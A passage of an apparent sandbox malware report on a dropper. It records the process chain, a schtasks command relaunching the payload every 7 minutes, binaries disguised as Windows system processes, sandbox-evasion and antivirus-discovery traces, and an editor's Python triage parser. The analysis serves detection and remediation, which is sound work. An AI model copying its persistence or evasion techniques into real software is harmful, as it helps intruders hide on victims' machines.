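The rows above give a responder three things to act on: a scheduled task that relaunches the payload every 7 minutes (/sc MINUTE /mo 7, so killing the process without deleting the task is not remediation), executables carrying Windows system-process names (Idle.exe, dasHost.exe, TextInputHost.exe, upfc.exe) dropped under Program Files subfolders where the genuine binaries never live, and a PE written directly into the user profile root. The Python below is an example added by the editor, not code from the Joe Sandbox report or from the sample; it parses rows in the "Source: X | Key: value" form used on this page and extracts exactly those facts. SYSTEM_PROCESS_NAMES and EXPECTED_DIRS are the editor's illustrative subset rather than any detection rule's full list, and the sample rows are a constructed copy of the findings above.

```python
import json
import re
from pathlib import PureWindowsPath

# Constructed sample: a subset of this report's "File created" and
# "Process created" rows, in the "Source: X | Key: value" form used above.
REPORT_LINES = [
    r"Source: C:\bridgehyperperfdhcp\intoDhcp.exe | File created: C:\Program Files (x86)\Mozilla Maintenance Service\TextInputHost.exe",
    r"Source: C:\bridgehyperperfdhcp\intoDhcp.exe | File created: C:\Program Files\Windows Portable Devices\Idle.exe",
    r"Source: C:\bridgehyperperfdhcp\intoDhcp.exe | File created: C:\bridgehyperperfdhcp\OjTEkrTlLyhdt.exe",
    r"Source: C:\bridgehyperperfdhcp\intoDhcp.exe | File created: C:\Users\user\OjTEkrTlLyhdt.exe",
    r"Source: C:\bridgehyperperfdhcp\intoDhcp.exe | File created: C:\Users\user\3D Objects\OjTEkrTlLyhdt.exe",
    r"Source: C:\bridgehyperperfdhcp\intoDhcp.exe | File created: C:\Program Files (x86)\Microsoft Office\dasHost.exe",
    r"Source: C:\bridgehyperperfdhcp\intoDhcp.exe | File created: C:\Program Files\Windows Portable Devices\upfc.exe",
    r"""Source: C:\bridgehyperperfdhcp\intoDhcp.exe | Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "OjTEkrTlLyhdtO" /sc MINUTE /mo 7 /tr "'C:\bridgehyperperfdhcp\OjTEkrTlLyhdt.exe'" /f""",
]

# Assumption: a hand-picked subset of Windows process names that malware likes to
# borrow, and the directories in which the genuine binaries live. A production
# rule would carry a fuller list; the logic is the same.
SYSTEM_PROCESS_NAMES = {
    "idle.exe", "dashost.exe", "textinputhost.exe", "upfc.exe",
    "svchost.exe", "csrss.exe", "lsass.exe", "winlogon.exe", "smss.exe",
}
EXPECTED_DIRS = (
    r"c:\windows\system32", r"c:\windows\syswow64",
    r"c:\windows\winsxs", r"c:\windows\systemapps",
)

LINE_RE = re.compile(r"^Source:\s*(?P<source>.+?)\s*\|\s*(?P<key>[^:]+):\s*(?P<value>.*)$")


def parse_line(line):
    """Split one report row into (source process, finding type, finding value)."""
    m = LINE_RE.match(line.strip())
    return (m["source"], m["key"].strip(), m["value"].strip()) if m else None


def is_masquerading(path):
    """True when a system-process file name is written outside its legitimate directories."""
    p = PureWindowsPath(path)
    parent = str(p.parent).lower()
    return p.name.lower() in SYSTEM_PROCESS_NAMES and not parent.startswith(EXPECTED_DIRS)


def is_user_root_drop(path):
    """True for an executable placed directly in C:\\Users\\<name>\\ (the profile root, not a subfolder)."""
    parts = PureWindowsPath(path).parts
    return len(parts) == 4 and parts[1].lower() == "users" and parts[3].lower().endswith(".exe")


SCHTASKS_RE = re.compile(
    r'/tn\s+"(?P<name>[^"]+)".*?/sc\s+(?P<unit>\w+)(?:\s+/mo\s+(?P<mod>\d+))?.*?/tr\s+"(?P<action>[^"]+)"',
    re.IGNORECASE,
)
MINUTES_PER_UNIT = {"MINUTE": 1, "HOURLY": 60, "DAILY": 1440}


def parse_schtasks(cmdline):
    """Pull task name, trigger interval and launched binary out of a schtasks /create command line."""
    m = SCHTASKS_RE.search(cmdline)
    if not m:
        return None
    unit, mod = m["unit"].upper(), int(m["mod"] or 1)
    per_unit = MINUTES_PER_UNIT.get(unit)
    return {
        "name": m["name"],
        "action": m["action"].strip("'"),  # the /tr value keeps its inner single quotes
        "schedule": f"{unit}/{mod}",
        "interval_minutes": per_unit * mod if per_unit else None,
        "force": "/f" in cmdline.lower().split(),  # /f overwrites an existing task of that name
    }


def triage(lines):
    """Reduce the rows to the persistence facts an incident responder needs."""
    out = {"masquerading": [], "user_root_drops": [], "tasks": []}
    for line in lines:
        parsed = parse_line(line)
        if not parsed:
            continue
        _source, key, value = parsed
        if key == "File created":
            if is_masquerading(value):
                out["masquerading"].append(value)
            if is_user_root_drop(value):
                out["user_root_drops"].append(value)
        elif key == "Process created" and "schtasks" in value.lower():
            task = parse_schtasks(value)
            if task:
                out["tasks"].append(task)
    return out


if __name__ == "__main__":
    print(json.dumps(triage(REPORT_LINES), indent=2))
```

On a live host the same three checks map onto `Get-ScheduledTask` output, a directory walk of Program Files, and a listing of each profile root; the point of the parser is that the task name, interval and target path come straight out of the command line the sandbox recorded, so the remediation list (delete task OjTEkrTlLyhdtO, remove the four masquerading binaries and the profile-root drop) can be produced without re-running the sample.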
            Source: C:\Users\user\Desktop\rWjaZEKha8.exe | Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\wscript.exe | Process information set: NOOPENFILEERRORBOX (observed 3 times)
            Source: C:\Windows\SysWOW64\cmd.exe | Process information set: NOOPENFILEERRORBOX
            Source: C:\bridgehyperperfdhcp\intoDhcp.exe | Process information set: NOOPENFILEERRORBOX (observed 50 times)
            Source: C:\Program Files\Windows Portable Devices\Idle.exe | Process information set: NOOPENFILEERRORBOX (observed 92 times)
            Source: C:\bridgehyperperfdhcp\OjTEkrTlLyhdt.exe | Process information set: NOOPENFILEERRORBOX (observed 66 times)
            Source: C:\Windows\System32\cmd.exe | Process information set: NOOPENFILEERRORBOX
            Note: SEM_NOOPENFILEERRORBOX (set via SetErrorMode) only suppresses the message box shown when a file cannot be found; runtimes and loaders set it routinely, and it appears here for cmd.exe and wscript.exe as well as for the payloads. Read these rows as an inventory of the process chain, not as evidence of evasion on their own.

            Malware Analysis System Evasion

            Source: C:\Program Files\Windows Portable Devices\Idle.exe | WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
            Source: C:\bridgehyperperfdhcp\intoDhcp.exe | Memory allocated: 15C0000 memory reserve | memory write watch
            Source: C:\bridgehyperperfdhcp\intoDhcp.exe | Memory allocated: 1B2D0000 memory reserve | memory write watch
            Source: C:\Program Files\Windows Portable Devices\Idle.exe | Memory allocated: E50000 memory reserve | memory write watch
            Source: C:\Program Files\Windows Portable Devices\Idle.exe | Memory allocated: 1AA60000 memory reserve | memory write watch
            Source: C:\Program Files\Windows Portable Devices\Idle.exe | Memory allocated: 7E0000 memory reserve | memory write watch
            Source: C:\Program Files\Windows Portable Devices\Idle.exe | Memory allocated: 1A610000 memory reserve | memory write watch
            Source: C:\bridgehyperperfdhcp\OjTEkrTlLyhdt.exe | Memory allocated: D50000 memory reserve | memory write watch
            Source: C:\bridgehyperperfdhcp\OjTEkrTlLyhdt.exe | Memory allocated: 1A8F0000 memory reserve | memory write watch
            Source: C:\bridgehyperperfdhcp\OjTEkrTlLyhdt.exe | Memory allocated: 15F0000 memory reserve | memory write watch
            Source: C:\bridgehyperperfdhcp\OjTEkrTlLyhdt.exe | Memory allocated: 1B4A0000 memory reserve | memory write watch
            Source: C:\bridgehyperperfdhcp\intoDhcp.exe | Thread delayed: delay time: 922337203685477
            Source: C:\Program Files\Windows Portable Devices\Idle.exe | Thread delayed: delay time: 922337203685477 (observed twice)
            Source: C:\Program Files\Windows Portable Devices\Idle.exe | Thread delayed: delay time: 600000
            Source: C:\Program Files\Windows Portable Devices\Idle.exe | Thread delayed: delay time: 599891
            Source: C:\Program Files\Windows Portable Devices\Idle.exe | Thread delayed: delay time: 599766
            Source: C:\Program Files\Windows Portable Devices\Idle.exe | Thread delayed: delay time: 599656
            Source: C:\Program Files\Windows Portable Devices\Idle.exe | Thread delayed: delay time: 599546
            Source: C:\Program Files\Windows Portable Devices\Idle.exe | Thread delayed: delay time: 599437
            Source: C:\Program Files\Windows Portable Devices\Idle.exe | Thread delayed: delay time: 599328
            Source: C:\Program Files\Windows Portable Devices\Idle.exe | Thread delayed: delay time: 599219
            Source: C:\Program Files\Windows Portable Devices\Idle.exe | Thread delayed: delay time: 599108
            Source: C:\Program Files\Windows Portable Devices\Idle.exe | Thread delayed: delay time: 599000
            Source: C:\Program Files\Windows Portable Devices\Idle.exe | Thread delayed: delay time: 598840
            Source: C:\Program Files\Windows Portable Devices\Idle.exe | Thread delayed: delay time: 598734
            Source: C:\Program Files\Windows Portable Devices\Idle.exe | Thread delayed: delay time: 598619
            Source: C:\Program Files\Windows Portable Devices\Idle.exe | Thread delayed: delay time: 598442
            Source: C:\Program Files\Windows Portable Devices\Idle.exe | Thread delayed: delay time: 922337203685477
            Source: C:\bridgehyperperfdhcp\OjTEkrTlLyhdt.exe | Thread delayed: delay time: 922337203685477 (observed twice)
            Source: C:\Windows\SysWOW64\wscript.exe | Window found: window name: WSH-Timer
            Source: C:\bridgehyperperfdhcp\intoDhcp.exe | Window / User API: threadDelayed 532
            Source: C:\bridgehyperperfdhcp\intoDhcp.exe | Window / User API: threadDelayed 1456
            Source: C:\Program Files\Windows Portable Devices\Idle.exe | Window / User API: threadDelayed 366
            Source: C:\Program Files\Windows Portable Devices\Idle.exe | Window / User API: threadDelayed 1493
            Source: C:\Program Files\Windows Portable Devices\Idle.exe | Window / User API: threadDelayed 2142
            Source: C:\bridgehyperperfdhcp\OjTEkrTlLyhdt.exe | Window / User API: threadDelayed 363
            Source: C:\bridgehyperperfdhcp\intoDhcp.exe TID: 7908 | Thread sleep count: 532 > 30
            Source: C:\bridgehyperperfdhcp\intoDhcp.exe TID: 7908 | Thread sleep count: 1456 > 30
            Source: C:\bridgehyperperfdhcp\intoDhcp.exe TID: 7884 | Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Program Files\Windows Portable Devices\Idle.exe TID: 2132 | Thread sleep count: 366 > 30
            Source: C:\Program Files\Windows Portable Devices\Idle.exe TID: 2416 | Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Program Files\Windows Portable Devices\Idle.exe TID: 5304 | Thread sleep count: 1493 > 30
            Source: C:\Program Files\Windows Portable Devices\Idle.exe TID: 5304 | Thread sleep count: 2142 > 30
            Source: C:\Program Files\Windows Portable Devices\Idle.exe TID: 7488 | Thread sleep time: -12912720851596678s >= -30000s
            Source: C:\Program Files\Windows Portable Devices\Idle.exe TID: 7488 | Thread sleep time: -600000s >= -30000s
            Source: C:\Program Files\Windows Portable Devices\Idle.exe TID: 7488 | Thread sleep time: -599891s >= -30000s
            Source: C:\Program Files\Windows Portable Devices\Idle.exe TID: 7488 | Thread sleep time: -599766s >= -30000s
            Source: C:\Program Files\Windows Portable Devices\Idle.exe TID: 7488 | Thread sleep time: -599656s >= -30000s
            Source: C:\Program Files\Windows Portable Devices\Idle.exe TID: 7488 | Thread sleep time: -599546s >= -30000s
            Source: C:\Program Files\Windows Portable Devices\Idle.exe TID: 7488 | Thread sleep time: -599437s >= -30000s
            Source: C:\Program Files\Windows Portable Devices\Idle.exe TID: 7488 | Thread sleep time: -599328s >= -30000s
            Source: C:\Program Files\Windows Portable Devices\Idle.exe TID: 7488 | Thread sleep time: -599219s >= -30000s
            Source: C:\Program Files\Windows Portable Devices\Idle.exe TID: 7488 | Thread sleep time: -599108s >= -30000s
            Source: C:\Program Files\Windows Portable Devices\Idle.exe TID: 7488 | Thread sleep time: -599000s >= -30000s
            Source: C:\Program Files\Windows Portable Devices\Idle.exe TID: 7488 | Thread sleep time: -598840s >= -30000s
            Source: C:\Program Files\Windows Portable Devices\Idle.exe TID: 7488 | Thread sleep time: -598734s >= -30000s
            Source: C:\Program Files\Windows Portable Devices\Idle.exe TID: 7488 | Thread sleep time: -598619s >= -30000s
            Source: C:\Program Files\Windows Portable Devices\Idle.exe TID: 7488 | Thread sleep time: -598442s >= -30000s
            Source: C:\Program Files\Windows Portable Devices\Idle.exe TID: 2304 | Thread sleep time: -30000s >= -30000s
            Source: C:\Program Files\Windows Portable Devices\Idle.exe TID: 1720 | Thread sleep time: -922337203685477s >= -30000s
            Source: C:\bridgehyperperfdhcp\OjTEkrTlLyhdt.exe TID: 7720 | Thread sleep count: 291 > 30
            Source: C:\bridgehyperperfdhcp\OjTEkrTlLyhdt.exe TID: 5244 | Thread sleep time: -922337203685477s >= -30000s
            Source: C:\bridgehyperperfdhcp\OjTEkrTlLyhdt.exe TID: 7684 | Thread sleep count: 363 > 30
            Source: C:\bridgehyperperfdhcp\OjTEkrTlLyhdt.exe TID: 4940 | Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Program Files\Windows Portable Devices\Idle.exe | WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_BaseBoard
            Source: C:\Program Files\Windows Portable Devices\Idle.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_BIOS
            Source: C:\Program Files\Windows Portable Devices\Idle.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_ComputerSystem
            Source: C:\Program Files\Windows Portable Devices\Idle.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\bridgehyperperfdhcp\intoDhcp.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
            Source: C:\Program Files\Windows Portable Devices\Idle.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
            Source: C:\Program Files\Windows Portable Devices\Idle.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
            Source: C:\bridgehyperperfdhcp\OjTEkrTlLyhdt.exeFile Volume queried: C:\ FullSizeInformation
            Source: C:\bridgehyperperfdhcp\OjTEkrTlLyhdt.exeFile Volume queried: C:\ FullSizeInformation
            Source: C:\Users\user\Desktop\rWjaZEKha8.exeCode function: 0_2_0017A5F4 FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,0_2_0017A5F4
            Source: C:\Users\user\Desktop\rWjaZEKha8.exeCode function: 0_2_0018B8E0 SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SetDlgItemTextW,SendDlgItemMessageW,FindFirstFileW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,FindClose,_swprintf,SetDlgItemTextW,SendDlgItemMessageW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,_swprintf,SetDlgItemTextW,0_2_0018B8E0
            Source: C:\Users\user\Desktop\rWjaZEKha8.exeCode function: 0_2_0018DD72 VirtualQuery,GetSystemInfo,0_2_0018DD72
            Source: C:\bridgehyperperfdhcp\intoDhcp.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Program Files\Windows Portable Devices\Idle.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Program Files\Windows Portable Devices\Idle.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Program Files\Windows Portable Devices\Idle.exeThread delayed: delay time: 600000Jump to behavior
            Source: C:\Program Files\Windows Portable Devices\Idle.exeThread delayed: delay time: 599891Jump to behavior
            Source: C:\Program Files\Windows Portable Devices\Idle.exeThread delayed: delay time: 599766Jump to behavior
            Source: C:\Program Files\Windows Portable Devices\Idle.exeThread delayed: delay time: 599656Jump to behavior
            Source: C:\Program Files\Windows Portable Devices\Idle.exeThread delayed: delay time: 599546Jump to behavior
            Source: C:\Program Files\Windows Portable Devices\Idle.exeThread delayed: delay time: 599437Jump to behavior
            Source: C:\Program Files\Windows Portable Devices\Idle.exeThread delayed: delay time: 599328Jump to behavior
            Source: C:\Program Files\Windows Portable Devices\Idle.exeThread delayed: delay time: 599219Jump to behavior
            Source: C:\Program Files\Windows Portable Devices\Idle.exeThread delayed: delay time: 599108Jump to behavior
            Source: C:\Program Files\Windows Portable Devices\Idle.exeThread delayed: delay time: 599000Jump to behavior
            Source: C:\Program Files\Windows Portable Devices\Idle.exeThread delayed: delay time: 598840Jump to behavior
            Source: C:\Program Files\Windows Portable Devices\Idle.exeThread delayed: delay time: 598734Jump to behavior
            Source: C:\Program Files\Windows Portable Devices\Idle.exeThread delayed: delay time: 598619Jump to behavior
            Source: C:\Program Files\Windows Portable Devices\Idle.exeThread delayed: delay time: 598442Jump to behavior
            Source: C:\Program Files\Windows Portable Devices\Idle.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\bridgehyperperfdhcp\OjTEkrTlLyhdt.exeThread delayed: delay time: 922337203685477
            Source: C:\bridgehyperperfdhcp\OjTEkrTlLyhdt.exeThread delayed: delay time: 922337203685477
            Source: wscript.exe, 00000001.00000003.1711808109.00000000028DD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
            Source: wscript.exe, 00000001.00000003.1712916802.0000000002919000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
            Source: rWjaZEKha8.exe, 00000000.00000003.1659563451.000000000298D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\\?\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\
            Source: Idle.exe, 00000015.00000002.1867010896.000000001B7B5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll3
            Source: rWjaZEKha8.exe, OjTEkrTlLyhdt.exe.4.dr, OjTEkrTlLyhdt.exe3.4.dr, OjTEkrTlLyhdt.exe4.4.dr, intoDhcp.exe.0.dr, OjTEkrTlLyhdt.exe2.4.dr, dasHost.exe.4.dr, OjTEkrTlLyhdt.exe1.4.dr, TextInputHost.exe.4.dr, OjTEkrTlLyhdt.exe0.4.dr, upfc.exe.4.drBinary or memory string: VPHWwjkbNEiTrqEMU9
            Source: rWjaZEKha8.exe, 00000000.00000003.1658460406.0000000002971000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
            Source: wscript.exe, 00000001.00000003.1712916802.0000000002919000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 0C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&
            Source: C:\Users\user\Desktop\rWjaZEKha8.exeAPI call chain: ExitProcess graph end nodegraph_0-23625
            Source: C:\bridgehyperperfdhcp\intoDhcp.exeProcess information queried: ProcessInformationJump to behavior
            Source: C:\Users\user\Desktop\rWjaZEKha8.exeCode function: 0_2_0019866F IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_0019866F
            Source: C:\Users\user\Desktop\rWjaZEKha8.exeCode function: 0_2_0019753D mov eax, dword ptr fs:[00000030h]0_2_0019753D
            Source: C:\Users\user\Desktop\rWjaZEKha8.exeCode function: 0_2_0019B710 GetProcessHeap,0_2_0019B710
            Source: C:\bridgehyperperfdhcp\intoDhcp.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Program Files\Windows Portable Devices\Idle.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Program Files\Windows Portable Devices\Idle.exeProcess token adjusted: DebugJump to behavior
            Source: C:\bridgehyperperfdhcp\OjTEkrTlLyhdt.exeProcess token adjusted: Debug
            Source: C:\bridgehyperperfdhcp\OjTEkrTlLyhdt.exeProcess token adjusted: Debug
            Source: C:\Users\user\Desktop\rWjaZEKha8.exeCode function: 0_2_0018F063 SetUnhandledExceptionFilter,0_2_0018F063
            Source: C:\Users\user\Desktop\rWjaZEKha8.exeCode function: 0_2_0018F22B SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_0018F22B
            Source: C:\Users\user\Desktop\rWjaZEKha8.exeCode function: 0_2_0019866F IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_0019866F
            Source: C:\Users\user\Desktop\rWjaZEKha8.exeCode function: 0_2_0018EF05 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_0018EF05
            Source: C:\bridgehyperperfdhcp\intoDhcp.exeMemory allocated: page read and write | page guardJump to behavior
            Source: C:\Users\user\Desktop\rWjaZEKha8.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\bridgehyperperfdhcp\6tAgwycUZiOpR.vbe" Jump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\bridgehyperperfdhcp\NwRTUiiV6D2Ys0Trm6fATcEH4s25r.bat" "Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\bridgehyperperfdhcp\intoDhcp.exe "C:\bridgehyperperfdhcp\intoDhcp.exe"Jump to behavior
            Source: C:\bridgehyperperfdhcp\intoDhcp.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\GoElC7XtGN.bat" Jump to behavior
            Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
            Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
            Source: C:\Users\user\Desktop\rWjaZEKha8.exeCode function: 0_2_0018ED5B cpuid 0_2_0018ED5B
            Source: C:\Users\user\Desktop\rWjaZEKha8.exeCode function: GetLocaleInfoW,GetNumberFormatW,0_2_0018A63C
            Source: C:\bridgehyperperfdhcp\intoDhcp.exeQueries volume information: C:\bridgehyperperfdhcp\intoDhcp.exe VolumeInformationJump to behavior
            Source: C:\bridgehyperperfdhcp\intoDhcp.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
            Source: C:\bridgehyperperfdhcp\intoDhcp.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformationJump to behavior
            Source: C:\Program Files\Windows Portable Devices\Idle.exeQueries volume information: C:\Program Files\Windows Portable Devices\Idle.exe VolumeInformationJump to behavior
            Source: C:\Program Files\Windows Portable Devices\Idle.exeQueries volume information: C:\Program Files\Windows Portable Devices\Idle.exe VolumeInformationJump to behavior
            Source: C:\Program Files\Windows Portable Devices\Idle.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
            Source: C:\Program Files\Windows Portable Devices\Idle.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformationJump to behavior
            Source: C:\bridgehyperperfdhcp\OjTEkrTlLyhdt.exeQueries volume information: C:\bridgehyperperfdhcp\OjTEkrTlLyhdt.exe VolumeInformation
            Source: C:\bridgehyperperfdhcp\OjTEkrTlLyhdt.exeQueries volume information: C:\bridgehyperperfdhcp\OjTEkrTlLyhdt.exe VolumeInformation
            Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformation
            Source: C:\Users\user\Desktop\rWjaZEKha8.exeCode function: 0_2_0018D5D4 GetCommandLineW,OpenFileMappingW,MapViewOfFile,UnmapViewOfFile,CloseHandle,GetModuleFileNameW,SetEnvironmentVariableW,GetLocalTime,_swprintf,SetEnvironmentVariableW,GetModuleHandleW,LoadIconW,DialogBoxParamW,Sleep,DeleteObject,DeleteObject,CloseHandle,0_2_0018D5D4
            Source: C:\Users\user\Desktop\rWjaZEKha8.exeCode function: 0_2_0017ACF5 GetVersionExW,0_2_0017ACF5
            Source: C:\Windows\SysWOW64\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
            Source: Idle.exe, 00000015.00000002.1867010896.000000001B760000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
            Source: C:\Program Files\Windows Portable Devices\Idle.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntivirusProduct
            Source: C:\Program Files\Windows Portable Devices\Idle.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM FirewallProduct

Stealing of Sensitive Information

Source: Yara match | File source: 00000004.00000002.1750999526.0000000003622000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000015.00000002.1857787065.0000000002611000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.1750999526.00000000032D1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000012.00000002.1838389619.0000000002A61000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000017.00000002.1838727941.00000000028F1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000001A.00000002.1838303042.00000000034A1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.1752275310.00000000132DF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: intoDhcp.exe PID: 7860, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: Idle.exe PID: 8136, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: Idle.exe PID: 8168, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: OjTEkrTlLyhdt.exe PID: 7232, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: OjTEkrTlLyhdt.exe PID: 3060, type: MEMORYSTR

Remote Access Functionality

Source: Yara match | File source: 00000004.00000002.1750999526.0000000003622000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000015.00000002.1857787065.0000000002611000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.1750999526.00000000032D1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000012.00000002.1838389619.0000000002A61000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000017.00000002.1838727941.00000000028F1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000001A.00000002.1838303042.00000000034A1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.1752275310.00000000132DF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: intoDhcp.exe PID: 7860, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: Idle.exe PID: 8136, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: Idle.exe PID: 8168, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: OjTEkrTlLyhdt.exe PID: 7232, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: OjTEkrTlLyhdt.exe PID: 3060, type: MEMORYSTR
MITRE ATT&CK Matrix (listed per tactic column; a leading number is the report's count of matching signatures for that technique, techniques without a number are matrix entries that were not observed)

Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS; Network Trust Dependencies
Resource Development: 11 Scripting; Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services; Serverless
Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise
Execution: 241 Windows Management Instrumentation; 2 Command and Scripting Interpreter; 1 Scheduled Task/Job; Cron; Launchd; Scheduled Task; Systemd Timers; Container Orchestration Job
Persistence: 1 Scheduled Task/Job; 11 Scripting; 1 DLL Side-Loading; Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job
Privilege Escalation: 11 Process Injection; 1 Scheduled Task/Job; 1 DLL Side-Loading; Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job
Defense Evasion: 113 Masquerading; 1 Disable or Modify Tools; 151 Virtualization/Sandbox Evasion; 11 Process Injection; 11 Deobfuscate/Decode Files or Information; 3 Obfuscated Files or Information; 22 Software Packing; 1 DLL Side-Loading
Credential Access: OS Credential Dumping; LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem
Discovery: 1 System Time Discovery; 261 Security Software Discovery; 1 Process Discovery; 151 Virtualization/Sandbox Evasion; 1 Application Window Discovery; 2 File and Directory Discovery; 57 System Information Discovery; System Owner/User Discovery
